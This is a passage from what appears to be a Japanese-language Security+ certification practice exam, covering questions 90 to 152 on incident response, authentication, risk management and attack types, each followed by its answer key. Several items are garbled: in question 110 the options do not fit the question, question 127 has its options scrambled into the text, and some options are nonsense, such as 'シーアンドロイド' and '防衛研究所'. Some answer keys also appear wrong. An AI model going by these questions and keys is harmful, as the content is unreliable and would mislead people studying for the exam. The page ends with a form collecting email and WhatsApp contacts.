C. サーバーへのポート445でのファイル共有を無効にする。
D. 信頼できないネットワークからのインバウンドポート3389をブロックする。
回答を見る
正解: C
質問 #90
あるセキュリティ・アナリストが、あるインシデント発生後、ウェブ・サーバの最新の脆弱性スキャン・レポートをレビューしている。その脆弱性レポートには、特に問題となる所見はなかった。サーバを悪用するために使用された脆弱性は、過去の脆弱性スキャンレポートに存在し、その脆弱性に対するパッチが利用可能です。最も可能性の高い原因はどれか。
A. バージョンの互換性がないため、セキュリティパッチのインストールに失敗しました。
B. 敵対者が脆弱性スキャンレポートを改ざんした。
C. ゼロデイ脆弱性がウェブサーバーを悪用した。
D. スキャンの結果、脆弱性が誤って検出されました。
回答を見る
正解: D
質問 #91
ある企業が、PHI文書の電子メール送信を制限したいと考えている。同社はDLPソリューションを導入している。PHI文書を制限するために、次のうち最初に実行すべきことはどれですか?
A. リテンション
B. ガバナンス
C. 分類
D. 変更管理
回答を見る
正解: C
質問 #92
ある会社の従業員が、会社の携帯電話に迷惑メールを受信している。未承諾のテキストメッセージにはパスワードリセットのリンクが含まれています。この会社を標的にした攻撃は次のうちどれですか。
A. フィッシング
B. ビッシング
C. スミッシング
D. スパム
回答を見る
正解: C
質問 #93
ある会社が新しい場所に移転することになった。システム管理者は、設備担当者に次のサーバールームの要件を提示しました。 - 停電や電圧スパイクの場合でも安定した電力レベル - 停電後、最低30分のランタイム - 重要なシステムのグレースフル・シャットダウンをトリガーする機能次のうち、最も要件を満たすのはどれでしょうか?
A. スタンバイのガス式発電機の維持管理
B. コンピュータ機器への大型サージサプレッサの使用
C. マネージドPDUを構成して電力レベルを監視する
D. 適切なサイズの、ネットワークに接続されたUPSデバイスを配置する
回答を見る
正解: D
質問 #94
多数の組織に影響を及ぼし、急速に広がっている攻撃を封じ込めるのに、最も効果的なのはどれか。
A. 機械学習
B. DNSシンクホール
C. ブロックリスト
D. ハニーポット
回答を見る
正解: B
質問 #95
最近の侵入テスト中に、テスト実施者は、インターネット経由で 12 ヶ月間に大量のデータが流出したことを発見した。侵入テスト実施者はテストを中止し、クライアントに調査結果を報告します。この問題を軽減するために、顧客が次に取るべき措置はどれですか。
A. 可能性のある脆弱性を特定するために、完全な脆弱性スキャンを実施する。
B. 重要なサーバーとリソースを封じ込める。
C. ファイアウォールを見直し、アクティブな接続元を特定する。
D. インフラ全体をインターネットから切り離す。
回答を見る
正解: B
質問 #96
あるセキュリティ・アナリストが、ある企業のユーザー名とパスワードのデータベースがインターネット・フォーラムに投稿されていることを発見した。ユーザー名とパスワードはプレーンテキストで保存されている。この種のデータ流出による被害を今後軽減できるのはどれか。
A. 文書がネットワークから出るのを防ぐDLPコントロールを作成する。
B. ソルティングとハッシングを実装する。
C. フォーラムへのアクセスをブロックするようにWebコンテンツフィルタを設定します。
D. パスワードの複雑さの要件を増やす
回答を見る
正解: B
質問 #97
リスク回避の例はどれか?
A. 本番環境に直接セキュリティ更新プログラムをインストールし、脆弱性の修正を迅速に行う
B. 保険に加入し、悪用に伴う金銭的損失に備える
C. 互換性エラーを防ぐために新しいソフトウェアをインストールしない
D. 盗難防止策を講じない
回答を見る
正解: C
質問 #98
セキュリティ・アーキテクトが、機密データを送信する電子メール・ソリューションに取り組んでいる。しかし、現在、追加インフラストラクチャを構築するための予算はありません。アーキテクトが選択すべきはどれか。
A. POP
B. IPSec
C. IMAP
D. PGP
回答を見る
正解: D
質問 #99
認証方法として、また不正アクセスに対する警告メカニズムとして機能するものはどれか。
A. スマートカード
B. プッシュ通知
C. 認証サービス
D. HMACベース
E. ワンタイムパスワード
回答を見る
正解: B
質問 #100
ある企業がファイルサーバーにDLPソリューションを導入しようとしている。ファイルサーバーにはPII、財務情報、健康情報が保存されている。ファイルサーバーにホストされているデータの種類に応じて、会社はデータに異なるDLPルールを割り当てたいと考えています。この目標を達成するために、同社が行うべきことは次のうちどれでしょうか?
A. データを分類する。
B. データをマスクする。
C. アプリケーションの所有者を割り当てる。
D. リスク分析を行う。
回答を見る
正解: A
質問 #101
顧客であるアンは、住宅ローン会社から、日常業務を維持するために彼女の個人情報をパートナー、関連会社、およびアソシエイトと共有する可能性があるという通知を受け取りました。アンが受け取った文書は次のうちどれですか?
A. プライバシーに関する年次通知
B. 秘密保持契約
C. 特権ユーザー契約
D. 覚書
回答を見る
正解: A
質問 #102
物理システムまたは仮想システムが壊滅的な損失を被った場合の対処方法を規定した文書は、次のうちどれですか?
A. データ保持計画
B. 事故対応計画
C. 災害復旧計画
D. コミュニケーション・プラン
回答を見る
正解: C
質問 #103
従業員の会社の電子メールは条件付きアクセスで設定されており、MFAを有効にして使用する必要がある。MFAの例としては、電話や:
A. プッシュ通知
B. パスワード
C. SMSメッセージ
D. 認証アプリケーション
回答を見る
正解: B
質問 #104
ある組織が新しいセキュリティ・システムを導入した。地元の法律では、悪質な活動を抑止するために、検知メカニズムに遭遇する前に市民に通知しなければならないことになっている。次のうちどれを導入しますか?
A. ガード付き近接カード
B. 電気フェンス
C. アラーム付きドローン
D. 看板付きモーションセンサー
回答を見る
正解: D
質問 #105
インシデント対応技術者が調査中にモバイルデバイスを回収しました。技術者は、保管の連鎖を維持するために、次のうちどれを行うべきですか?
A. コレクションを文書化し、所有権が変更された場合は署名を求める。
B. 盗難や改ざんを防ぐため、デバイスを金庫などの安全な場所にロックする。
C. データの破損を防ぐため、デバイスをファラデーケージに入れる。
D. ブロックチェーンで保護された公開台帳にコレクションを記録する。
回答を見る
正解: A
質問 #106
UIデベロッパー契約に携わる顧客が、機密性の高いプロジェクトでこれらの製品の使用を検討する際に注意すべきことはどれか。
A. 弱いコンフィギュレーション
B. 統合活動
C. 安全でないユーザーアカウント
D. コード開発のアウトソーシング
回答を見る
正解: A
質問 #107
セキュリティインシデントの根本原因が特定された後に、今後のインシデントの発生を回避するために実施する手順はどれか。
A. ウォークスルー
B. 教訓
C. 攻撃フレームワークの調整
D. 封じ込め
回答を見る
正解: B
質問 #108
初期設定の一環として、新しいネットワークデバイスにラベルを付ける方法のガイドラインを提供するのはどれか。
A. IPスキーマ
B. アプリケーションのベースライン構成
C. 標準命名規則ポリシー
D. 無線LANとネットワーク境界図
回答を見る
正解: C
質問 #109
あるセキュリティアナリストが、企業のウェブアプリケーションへの不正アクセスと思われるものを調査している。セキュリティアナリストは、Webサーバーのログを確認し、流れるエントリを見つけます。
A. 辞書
B. ブルートフォース
C. レインボーテーブル
D. スプレー
回答を見る
正解: B
質問 #110
ある組織は、新しいモバイルデバイスポリシーを導入し、各従業員に新しいノートパソコンを支給することを計画している。これらのラップトップは、リモートでユーザーの企業オペレーティングシステムにアクセスし、職務外の目的でラップトップを使用できるようにします。次の導入モデルのどれを利用しますか?
A. ブルートフォース
B. キーロガー
C. 辞書
D. レインボー
回答を見る
正解: C
質問 #111
内部ネットワークで不正なデバイスが検出された。デバイスの位置は、会議室にあるイーサネットポートまで追跡されました。これらのデバイスが内部ネットワークにアクセスするのを防ぐために実施する技術的コントロールとして、最も適切なものはどれか。
A. NAC
B. DLP
C. IDS
D. MFA
回答を見る
正解: A
質問 #112
ソフトウェアとインフラのコストを削減・抑制するため、最高情報責任者は電子メールサービスをクラウドに移行するよう要請した。クラウドプロバイダーと組織は、機密データを保護するためのセキュリティ管理を行わなければならない。この要求に対応できるクラウドサービスは、次のうちどれがベストでしょうか?
A. IaaS
B. PaaS
C. DaaS
D. SaaS
回答を見る
正解: D
質問 #113
あるセキュリティ管理者が、すべてのクラウド資産に対して毎週脆弱性スキャンを実施し、詳細なレポートを提供しています。次のうち、管理者の活動を表すものはどれですか。
A. 継続的デプロイメント
B. 継続的インテグレーション
C. データ所有者
D. データプロセッサー
回答を見る
正解: D
質問 #114
最高情報セキュリティ責任者(CISO)は、あるサードパーティベンダーに対し、顧客データを保護するために適切な管理が行われていることを示す裏付け文書を提出するよう要請しました。サードパーティベンダーがCISOに提出する書類として、最も適切なものはどれか。
A. GDPRコンプライアンス認証
B. クラウド・セキュリティ・アライアンスの資料
C. SOC 2 タイプ2報告書
D. NIST RMFワークブック
回答を見る
正解: C
質問 #115
次のうち、人の危機感を利用しようとするソーシャル・エンジニアリングのテクニックを説明したものはどれか?
A. 現金決済が行われたが、間もなく期限切れになるというフィッシングメール。
B. 荷物が集荷予定であることを示すスミッシングメッセージ
C. 地元の慈善団体への寄付を要求するフィッシング・コール
D. サイバー犯罪を捜査する覆面捜査官を名乗るSPIM通知
回答を見る
正解: C
質問 #116
インシデント対応中、アナリストがボーダーファイアウォールのすべてのインバウンドトラフィックにルールを適用し、各重要サーバーに ACL を実装した。調査の結果、アウトバウンドトラフィックが制限されておらず、敵対者がネットワーク内に存在することができるため、同社は依然として脆弱であることに気づきました。敵対者は現在、サイバーキルチェーンの次のどの段階で活動していますか?
A. 偵察
B. 指揮統制
C. 目的に対する行動
D. 搾取
回答を見る
正解: B
質問 #117
セキュリティアナリストは、ネットワークが1日の特定の時間帯に悪意のあるパケットであふれかえることに気づきました。この問題を調査するために、アナリストは次のうちどれを使用すべきか?
A. ウェブメタデータ
B. 帯域幅モニター
C. システムファイル
D. 相関ダッシュボード
回答を見る
正解: B
質問 #118
あるセキュリティ・エンジニアが、ある会社に新しいワイヤレス・ネットワークを導入しようとしている。その会社は複数のテナントとオフィススペースを共有しています。機密データが許可されていないユーザーに公開されないようにするために、エンジニアがワイヤレスネットワークに設定すべきは次のうちどれですか。
A. EAP
B. TLS
C. HTTPS
D. AES
回答を見る
正解: D
質問 #119
証拠が収集され、当局に提供される際に、法的手続きにおいて認められることを保証するために使用されるものはどれか。
A. チェーン・オブ・カストディ
B. リーガル・ホールド
C. イベントログ
D. 人工物
回答を見る
正解: A
質問 #120
サイバーセキュリティ管理者は、ネットワークにレイヤ7のセキュリティ制御を実装し、潜在的な攻撃をブロックする必要があります。レイヤ7で攻撃をブロックできるのはどれか。
A. HIDS
B. NIPS
C. HSM
D. WAF
E. NAC
F. 防衛研究所
回答を見る
正解: BD
質問 #121
警備の厳重な建物に入る途中、見知らぬ人物が従業員と会話を始めた。従業員がドアで必要なバッジをスキャンしている間、見知らぬ個人は、一見礼儀正しく見えるが、従業員のためにドアを開けたままにしている。次のソーシャル・エンジニアリングのテクニックのうち、どれが利用されていますか?
A. ショルダーサーフィン
B. 水飲み場攻撃
C. テールゲート
D. なりすまし
回答を見る
正解: C
質問 #122
フォレンジック調査官は、同社のウェブサイトで報告された多数の不正決済を調査している。いくつかの異常なログ・エントリによると、ユーザーは不要なメーリング・リストのメールを受信し、購読解除を試みるためにリンクをクリックした。ユーザーの一人がそのメールをフィッシングチームに報告し、転送されたメールからリンクがClick here to unsubscribeであることが判明しました。
A. SQLインジェクション
B. 壊れた認証
C. XSS
D. XSRF
回答を見る
正解: D
質問 #123
セキュリティアナリストは、セキュリティインシデントがどのように発生したか、復旧のためにどのような手順が取られたか、今後のインシデントをどのように回避できるかについて詳述した文書を作成する必要がある。この作業は、対応プロセスの次のどの段階で行われるか。
A. 回復
B. 身分証明書
C. 教訓
D. 準備
回答を見る
正解: C
質問 #124
従業員が携帯端末で複数のメッセージを受信した。そのメッセージは、従業員にそのデバイスを未知のデバイスとペアリングするよう指示していました。この問題を発生させるために悪意のある人物が行っている可能性のある行為として、最も適切なものは次のngのうちどれでしょうか。
A. ジャミング
B. ブルースナーフィング
C. 悪の双子攻撃
D. 不正アクセスポイント
回答を見る
正解: B
質問 #125
次の災害復旧計画演習のうち、IT運用の中断が最も少ないものはどれですか?
A. パラレル
B. フルスケール
C. 卓上
D. シミュレーション
回答を見る
正解: C
質問 #126
ある企業は、エンドユーザーが信頼できるパートナーのウェブサイトにログインする際の体験を改善したいと考えている。同社は、ユーザーにパートナーウェブサイト用の別の認証情報を発行させたくありません。信頼できるパートナーのWebサイトにログインするために、ユーザーが自分の認証情報を使用して認証できるようにするには、次のうちどれを実装する必要がありますか?
A. ディレクトリサービス
B. AAAサーバー
C. 連盟
D. 多要素認証
回答を見る
正解: C
質問 #127
あるセキュリティエンジニアが、MF を使用するように構成された SAML アプリケーションのログをレビューしている。
A. このレビュー中、エンジニアは、海外出張中のユーザから MFA を必要としないログインが大量に成功し ていることに気づいた。VPN なしでアクセスできるアプリケーションには、時間ベースのトークンを生成できるポリシーがあります。場所を変更したユーザは再認証が必要なはずですが、再認証をしなくてもログインできています。次の記述のうち、最も適切なものはどれですか。
B.
A. OpenIDは、MFA要件を機能させるために必須です。
C. B
D. C
E. D
回答を見る
正解: D
質問 #128
ポート80経由で会社のデータを盗んでいるハッカーを検出するために使用できるのは、次のうちどれですか?
A. GPSタグ付け
B. リモートワイプ
C. 画面ロックタイマー
D. シーアンドロイド
回答を見る
正解: D
質問 #129
セキュリティ・インシデントの調査中に、アナリストが会社のSIEMを参照し、既知の悪意のあるコマンド・アンド・コントロール・サーバへのトラフィックが多いことを示すイベントを確認しました。アナリストは、この問題によって影響を受ける可能性のある会社のワークステーションの数を特定したいと考えています。この情報を提供できるのは次のうちどれでしょうか。
A. WAFログ
B. DNSログ
C. システムログ
D. アプリケーションログ
回答を見る
正解: B
質問 #130
セキュリティアナリストは、単一のツールで複数のソースからのログを検索し、関連付けることができる必要があります。セキュリティアナリストがこの能力を持つために最も適しているのは、次のうちどれですか?
A. SOAR
B. SIEM(シーム
C. ログコレクター
D. ネットワーク・アタッチド・ストレージ
回答を見る
正解: B
質問 #131
現在の秘密鍵が漏洩した場合、その秘密鍵を使用してすべての履歴データを復号化できないようにするためには、次のうちどれが有効か。
A. 完全な前方秘匿性
B. 楕円曲線暗号
C. キー・ストレッチ
D. 同型暗号
回答を見る
正解: A
質問 #132
あるユーザのアカウントが常にロックアウトされています。さらに検討した結果、セキュリティアナリストはSIEMで次のことを発見しました。
A. 攻撃者がアカウントに対してパスワード・スプレー攻撃を行っている。
B. 攻撃者はアカウントに対して辞書攻撃を利用している。
C. 攻撃者はアカウントに対してブルートフォース攻撃を利用している。
D. 攻撃者がアカウントに対してレインボーテーブル攻撃を利用している。
回答を見る
正解: C
質問 #133
ある事業運営管理者は、事業運営に不可欠なPCが間もなく高額なハードウェア障害を起こすのではないかと懸念している。このマネージャーは、多額のコストをかけずに業務を継続するための選択肢を探しています。このマネジャーの懸念を和らげることができるのは、次のうちどれでしょうか?
A. システムの全面的なアップグレードを実施する。
B. 物理から仮想への移行を実行する。
C. 無停電電源装置を設置する。
D. サイバーセキュリティ保険に加入する。
回答を見る
正解: B
質問 #134
ある企業が最近データ漏洩に見舞われ、その情報源は公共の場所で携帯電話を充電していた幹部社員であることが判明しました。この情報漏洩を防げた可能性が最も高いのは次のうちどれでしょうか?
A. ファイアウォール
B. デバイス・ピン
C. USBデータブロッカー
D. バイオメトリクス
回答を見る
正解: C
質問 #135
ソースコードの中に隠されたオーディオファイルがあることを示すものは、次のうちどれでしょう?
A. ステガノグラフィー
B. 同型暗号化
C. 暗号スイート
D. ブロックチェーン
回答を見る
正解: A
質問 #136
医療費請求の定期監査で、いくつかの請求が加入者の知らないうちに提出されていたことが判明した。医療費請求会社のシステムの監査ログを調べたところ、会社の従業員が顧客の記録をダウンロードし、個人の銀行口座への口座振替情報を調整したことが判明した。
A. インサイダーの脅威
B. ソーシャル・エンジニアリング
C. 第三者リスク
D. データ漏洩
回答を見る
正解: A
質問 #137
ある企業が、マーケティングビジネスで利用できるユーザー情報を取得するために、別の国でウェブサイトを立ち上げる。会社自体はその情報を使用しない。同社が想定している役割は次のうちどれでしょうか?
A. データ所有者
B. データプロセッサー
C. データ・スチュワード
D. データコレクター
回答を見る
正解: D
質問 #138
あるクリプトマイニング会社が最近、新しいアンチウイルス・アプリケーションを全マイニング・システムに導入した。ウイルス対策アプリケーションのインストールは多くの個人用デバイスでテストされ、問題は観察されなかった。ウイルス対策アプリケーションがサーバーに展開されると、絶え間ない問題が報告されました。その結果、同社はマイニングソフトウェアを削除することを決定した。ウイルス対策アプリケーションは、このソフトウェアを次のように分類していた可能性が高い:
A. ルートキット。
B. a PUP。
C. バックドア。
D. ランサムウェア
E. a RAT
回答を見る
正解: B
質問 #139
あるユーザーが、社内ネットワークからデスクトップを使用して、ある Web サイトに移動しようとしている。ユーザーがURL「https://www.site.com」を入力すると、ブラウザーから証明書の不一致に関する警告が表示される。ユーザーが http://www.anothersite.com にアクセスすると、警告は表示されません。この攻撃を説明するものはどれか。
A. オンパス
B. ドメインハイジャック
C. DNSポイズニング
D. 邪悪な双子
回答を見る
正解: B
質問 #140
ある組織では、EAP のクライアント側証明書とサーバー側証明書の使用を廃止しようとしている。この企業は、新しい EAP ソリューションに不正なアクセスポイントを検出する機能を持たせたいと考えています。これらの要件を達成できるのは、次のうちどれでしょうか。
A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS
回答を見る
正解: B
質問 #141
ある会社の取締役会は、組織の責任を限定するために保険会社と契約した。これは、次のリスク管理のうち、どれを最もよく表しているか?
A. 転移
B. 回避
C. 緩和
D. 謝辞
回答を見る
正解: A
質問 #142
ユーザーのノートパソコンがWi-Fiネットワークから常に切断される。ノートパソコンが再接続されると、ユーザーはインターネットにアクセスできますが、共有フォルダやその他のネットワークリソースにアクセスできません。このユーザーが経験している可能性が最も高いのは、次のどのタイプの攻撃でしょうか。
A. ブルージャック
B. ジャミング
C. 不正アクセスポイント
D. 邪悪な双子
回答を見る
正解: D
質問 #143
ある侵入テスト者が、スタックの EIP がメモリ上のどこにあるかを特定するために、アプリケーションをファジングしている。侵入テスト者は次のどの攻撃を実行する予定ですか?
A. レースコンディション
B. パス・ザ・ハッシュ
C. バッファオーバーフロー
D. XSS
回答を見る
正解: C
質問 #144
ある管理者がユーザーのパスワードを保護する必要があり、パスワードをハッシュ化するよう助言されました。管理者がアドバイスされていることを最もよく表しているのは次のうちどれですか?
A. パスワードを一意な文字列に変換する数学的操作を行う。
B. パスワードに余分なデータを追加することで、パスワードの長さを長くし、ブルートフォースしにくくする。
C. システム内のすべてのパスワードを、一元管理されたレインボーテーブルに保存する。
D. ログインセッションごとに変更されるワンタイムパスワードの使用を強制する。
回答を見る
正解: A
質問 #145
ある中小企業のシステム管理者は、無線ルーターを調べているときに、何者かが正規デバイスの MAC アドレスを偽装していることを発見しました。以下の表から、可用性に影響を与えずに不正なシステムがあるかどうかを検出するために、管理者が次に行うべきことはどれですか。
A. Pingスイープを行う、
B. 各システムを物理的にチェックする。
C. 「UNKNOWN」ホスト名へのインターネットアクセスを拒否する。
D. MACフィルタリングを適用する。
回答を見る
正解: A
質問 #146
ユーザーの共通サインイン・プロパティのベースラインを作成することで、リモート・アクセスの要求を追跡するセキュリティ提案が設定された。ベースラインの逸脱が検出されると、MFAチャレンジがトリガーされます。このプロポーザルを展開するには、次のうちどれを構成する必要がありますか?
A. コンテキストを考慮した認証
B. 対等の同時認証
C. 広範な認証プロトコル
D. エージェントレス・ネットワーク・アクセス制御
回答を見る
正解: A
質問 #147
あるアナリストが、ネットワーク上のホストに対するビーコン活動の複数のアラートを受信した。アクティビティを分析した後、アナリストは次のアクティビティを観察します:-あるユーザがWebブラウザにcomptia.orgを入力します。-表示されたWebサイトはcomptia.orgのサイトではありません。-そのWebサイトは攻撃者による悪意のあるサイトです。
A. オンパス攻撃
B. DNSポイズニング
C. ロケータ(URL)のリダイレクト
D. ドメインハイジャック
回答を見る
正解: C
質問 #148
誰が証拠にアクセスできるかを文書化するプロセスを最もよく表しているのはどれか。
A. 変動率
B. チェーン・オブ・カストディ
C. 否認防止
D. 許容性
回答を見る
正解: B
質問 #149
次のうち、無許可の人間を護送している間、スタッフに責任を負わせるものはどれか?
A. ロックス
B. バッジ
C. カメラ
D. 来場者ログ
回答を見る
正解: D
質問 #150
次のプロセスのうち、プロセス終了後にストレージデバイスを再利用できる方法でデータを消去するものはどれか。
A. 粉砕
B. 上書き
C. シュレッダー
D. デガウジング
回答を見る
正解: B
質問 #151
セキュリティアナリストは、会社のネットワークデバイスの認証情報と権限を一元管理する必要がある。認証サーバーとデバイスはTCPで通信する必要があります。アナリストが選択すべき認証プロトコルは次のうちどれですか?
A. ケルベロス
B. CHAP
C. TACACS+
D. RADIUS
回答を見る
正解: C
質問 #152
セキュリティ・アーキテクトは、機密データを大型スクリーンに表示できるワークステーションを会議室に配備する必要がある。データの性質上、会議室に保存することはできない。ファイル共有はローカルデータセンターにあります。この要件を満たすために、セキュリティアーキテクトが推奨する最善の方法はどれか。
A. フォグ・コンピューティングとKVM
B. VDIとシンクライアント
C. プライベートクラウドとDLP
D. フルドライブ暗号化とシッククライアント
回答を見る
正解: B

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: